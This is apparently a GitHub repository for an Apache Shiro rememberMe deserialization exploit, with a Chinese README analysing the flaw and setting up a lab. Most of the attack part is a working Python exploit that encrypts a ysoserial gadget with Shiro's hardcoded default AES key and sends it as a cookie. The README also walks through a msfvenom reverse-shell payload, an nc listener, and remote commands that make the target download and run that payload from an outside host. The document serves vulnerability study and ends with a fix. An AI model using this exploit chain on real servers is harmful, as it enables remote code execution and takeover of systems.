├── README.md ├── img ├── .DS_Store ├── 1.png ├── 2.png └── 3.png ├── shiro.war ├── shiro_exploit.py └── ysoserial.jar /README.md: -------------------------------------------------------------------------------- 1 | # Apache Shiro Java 反序列化漏洞分析及利用 2 | # 0x00 项目地址 3 | https://github.com/HexChristmas/Shiro_exploit 4 | # 0x01 概述 5 | > 这两天被派去护网&重保,态势感知报了一条冰蝎的远程代码执行的告警,在通过告警日志以及webshell及相关信息,红队大概是通过shiro反序列化拿到主机权限,之前一大佬还特别分享过shiro反序列化漏洞,还没来及研究就碰上了,正好这个机会研究分析一波, 6 | 7 | shiro用remembreme这个cookie对用户进行鉴权,防止出现越权问题,它使用```CookieRemembreMeManager```这个类,对remebremecookie的key使用```ObjectInputStream```类进行序列化,然后对字符流进行用aes加密方式对其进行base64编码,然后返回客户端```remebremeCookie```,这其实是有问题的,shiro把其实aes的密钥硬编码在代码里类,我们可以通过ysoserial这个的```CommonsCollections2```这个方法来调试代码发现aes加密的密钥进行对其解密解密,我们解密之后就可以生成并返回带有远程代码执行的```remebremeCookie```进而反弹shell 8 | # 0x02 漏洞环境 9 | ### 方法一:Docker环境搭建 10 | 这里可以直接pull大佬们做好的docker的漏洞环境 11 | ``` 12 | docker pull medicean/vulapps:s_shiro_1 13 | ``` 14 | 将docker漏洞环境的8080端口映射到本机的80端口 15 | ``` 16 | docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 17 | ``` 18 | ### 方法二:Linux虚拟机或者VPS搭建tomcat及shiro环境 19 | java环境啥的鸟都带了 20 | 直接去tomcat官网去下载二进制包,不用百度了,这里直接给你百度完了,[点击我进行跳转,Run!](http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz) 21 | 或者你直接可以 22 | ``` 23 | sudo wget http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz /usr/share 24 | ``` 25 | 然后直接解压 26 | ``` 27 | sudo tar zxvf apache-tomcat-8.5.43..tar.gz 28 | ``` 29 | ``` 30 | /usr/share/apache-tomcat-8.5.43/bin/startup.sh 31 | ``` 32 | 我们现在只需把shiro包放到webapps下即可 33 | ``` 34 | sudo cp shiro.war /usr/share/apache-tomcat-8.5.43/webapps 35 | ``` 36 | 然后访问 37 | ``` 38 | localhost:8080/Shiro 39 | ``` 40 | ![shiro](https://raw.githubusercontent.com/HexChristmas/Shiro_exploit/master/img/3.png) 41 | 42 | 能看到这个就说明你已经启动成功了 43 | # 0x02 漏洞利用 44 | 用msfvenom生成payload用于反弹shell 45 | ``` 46 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=2333 elf > payload 47 | ``` 48 | ![msfvenom](https://raw.githubusercontent.com/HexChristmas/Shiro_exploit/master/img/1.png) 49 | 50 | nc监听2333端口 51 | ``` 52 | nc -lvvp 2333 53 | ``` 54 | 使用shiro的脚本进行远程代码执行漏洞利用 55 | ``` 56 | python shiro_exploit.py "http://127.0.0.1:81" "wget -p /tmp/ http://172.18.24.35/payload" 57 | ``` 58 | ``` 59 | python shiro_exploit.py "http://127.0.0.1:81" "chmod +x /tmp/payload" 60 | ``` 61 | ``` 62 | python shiro_exploit.py "http://127.0.0.1:81" "/tmp/payload" 63 | " 64 | ``` 65 | ![exploit](https://raw.githubusercontent.com/HexChristmas/Shiro_exploit/master/img/2.png) 66 | 67 | # 0x03 漏洞修复 68 | 升级 Shiro 版本至 1.2.5 以上 69 | # 0x4 参考文档 70 | https://issues.apache.org/jira/browse/SHIRO-550 71 | 72 | https://www.seebug.org/vuldb/ssvid-92180 73 | -------------------------------------------------------------------------------- /img/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/.DS_Store -------------------------------------------------------------------------------- /img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/1.png -------------------------------------------------------------------------------- /img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/2.png -------------------------------------------------------------------------------- /img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/3.png -------------------------------------------------------------------------------- /shiro.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/shiro.war -------------------------------------------------------------------------------- /shiro_exploit.py: -------------------------------------------------------------------------------- 1 | import os 2 | import re 3 | import base64 4 | import uuid 5 | import subprocess 6 | import requests 7 | import sys 8 | from Crypto.Cipher import AES 9 | 10 | JAR_FILE = 'ysoserial.jar' 11 | 12 | def poc(url,rce_command): 13 | if '://' not in url: 14 | target = 'https://%s' % url if ':443' in url else 'http://%s' % url 15 | else: 16 | target = url 17 | try: 18 | payload = generator(rce_command,JAR_FILE) 19 | r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10) 20 | print r.text 21 | except Exception, e: 22 | pass 23 | return False 24 | 25 | def generator(command, fp): 26 | if not os.path.exists(fp): 27 | raise Exception('jar file not found') 28 | popen = subprocess.Popen(['java','-jar',fp,'CommonsCollections2',command], 29 | stdout=subprocess.PIPE) 30 | BS = AES.block_size 31 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 32 | key = "kPH+bIxk5D2deZiIxcaaaA==" 33 | mode = AES.MODE_CBC 34 | iv = uuid.uuid4().bytes 35 | encryptor = AES.new(base64.b64decode(key), mode, iv) 36 | file_body = pad(popen.stdout.read()) 37 | base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) 38 | return base64_ciphertext 39 | 40 | if __name__ == '__main__': 41 | url = str(sys.argv[1]) 42 | cmd = str(sys.argv[2]) 43 | poc(url,cmd) 44 | -------------------------------------------------------------------------------- /ysoserial.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/ysoserial.jar --------------------------------------------------------------------------------